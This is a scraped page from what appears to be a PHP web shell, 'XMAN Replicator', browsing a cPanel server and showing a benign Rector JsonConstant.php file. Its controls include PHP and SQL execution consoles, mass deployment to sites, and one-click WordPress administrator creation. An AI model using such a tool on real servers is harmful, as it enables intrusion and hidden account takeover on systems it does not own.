🛸 XMAN Replicator
English
Русский
Français
Quit
Path:
/
opt
/
cpanel
/
ea-wappspector
/
vendor
/
rector
/
rector
/
vendor
/
rector
/
rector-downgrade-php
/
src
/
Enum
/
📋 نشر إلى المواقع
👤 إنشاء مشرف WP
Upload
Make directory
Name
Size
Rights
Date
Actions
[.]
<DIR>
drwxr-xr-x
2024-11-08 13:59
🔄
🗑️
🗑️📁
⬇️
🔒
[..]
<DIR>
drwxr-xr-x
2024-11-08 13:59
🔄
🗑️
🗑️📁
⬇️
🔒
JsonConstant.php
390 B
-rw-r--r--
2024-11-08 13:59
✏️
🔄
🗑️
⬇️
🔒
Edit: JsonConstant.php
<?php declare (strict_types=1); namespace Rector\Enum; final class JsonConstant { /** * @var string */ public const INVALID_UTF8_IGNORE = 'JSON_INVALID_UTF8_IGNORE'; /** * @var string */ public const INVALID_UTF8_SUBSTITUTE = 'JSON_INVALID_UTF8_SUBSTITUTE'; /** * @var string */ public const THROW_ON_ERROR = 'JSON_THROW_ON_ERROR'; }
Save
PHP Console
Execute
SQL Console
Execute